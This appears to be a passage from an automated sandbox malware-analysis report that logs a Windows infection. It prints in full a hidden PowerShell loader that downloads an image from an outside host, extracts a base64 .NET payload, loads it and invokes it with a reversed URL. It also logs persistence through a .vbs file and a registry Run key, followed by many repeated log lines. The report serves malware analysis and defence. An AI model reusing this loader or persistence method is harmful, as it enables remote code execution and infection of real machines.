TreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_00007FF848940998 push E95B71D0h; ret

2_2_00007FF8489409C9

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name_File.vbs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
